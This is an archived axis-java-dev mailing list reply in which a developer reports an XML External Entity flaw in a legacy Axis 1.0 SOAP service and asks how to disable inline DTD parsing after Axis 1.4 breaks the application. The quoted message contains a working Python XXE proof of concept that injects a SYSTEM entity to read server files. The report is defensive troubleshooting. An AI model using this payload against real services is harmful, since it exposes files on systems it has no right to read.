axis-java-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Andreas Veithen <andreas.veit...@gmail.com>
Subject Re: XXE DTD Issue :- Urgent !!
Date Sat, 18 Aug 2018 23:07:44 GMT
On Fri, Aug 17, 2018 at 12:50 PM Ronak Sharda <ronak.sharda@aricent.com> wrote:
>
> Hi Team,
>
>
>
> Greetings for the day !
>
>
>
> We are working on an application where an XML External Entity Injection Vulnerability
issue has come across.
>
>
>
> SOAP Interaction between Client and Server when Entity Doctype tag is introduced:-
>
> Currently Axis 1.0 jar is being is used in the application.
>
>
>
> headers = {'content-type': 'text/xml', 'SOAPAction':'' }
>
> body = """<!DOCTYPE getAccountDataTemplate [ <!ENTITY file SYSTEM "%s"> ]>
>
>           <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:enc="XXXXXXXXXXXXXXXXXXXXXXXX">
>
>           <soapenv:Header/>
>
>           <soapenv:Body>
>
>           <enc:getAccountDataTemplate soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
>
>           <templateId xsi:type="xsd:string">&file;</templateId>
>
>           </enc:getAccountDataTemplate>
>
>           </soapenv:Body>
>
>           </soapenv:Envelope>""" % fpath
>
>
>
> with requests.Session() as session:
>
>     download_req = session.post( xurl + “XXXXXXXXXXXXXXXXXXXXXXXX", data = body , headers=headers,
verify=False, allow_redirects=True)
>
>     print download_req.text
>
>
>
>                 XXXXXXXXXXXXXXXXXXXXXXXX :- Service URL
>
>
>
>                 Actual Output:- Execution of this script results in printing of the contents
of the drive of the system.
>
>                 Expected Output:- Drive content should not be shown, inline DTD parsing
should be disabled.
>
>
>
> To overcome the above problem, Axis 1.0 jar is replaced with upgraded version i.e. Axis
1.4.
>
>
>
> Actual Output:- Execution of the script in point 1 results in the below Exception:
>
>
>
> <?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><soapenv:Fault><faultcode>soapenv:Server.userException</faultcode><faultstring>org.xml.sax.SAXException:
Processing instructions are not allowed within SOAP messages</faultstring><detail><ns1:hostname
xmlns:ns1="http://xml.apache.org/axis/">WIN-6A0L1CSU3OS</ns1:hostname></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>
>
>
>
>                 Along with the above output, application breaks since there are multiple
SOAP calls that interact within the application (client and server).

Can you explain this a bit more?

>
>
>
> Expected Output:- Inline DTD Parsing should be disabled, and the application should not
break.
>
>
>
>
>
>                 Any help in this context is highly appreciated. Looking forward to the
response.
>
>
>
>                 NOTE:- We won’t be able to upgrade the jar to Axis2, since it is a
Legacy application and it will be a gigantic change to work with.
>
>
>
> Kindly let us know if any other information related to the above task/issue is needed
of us.
>
>
>
> Regards,
>
> Ronak Sharda
>
>
>
>
>
> =====================================================
> Please refer to http://www.aricent.com/email-disclaimer
> for important disclosures regarding this electronic communication.
> =====================================================

---------------------------------------------------------------------
To unsubscribe, e-mail: java-dev-unsubscribe@axis.apache.org
For additional commands, e-mail: java-dev-help@axis.apache.org


Mime
View raw message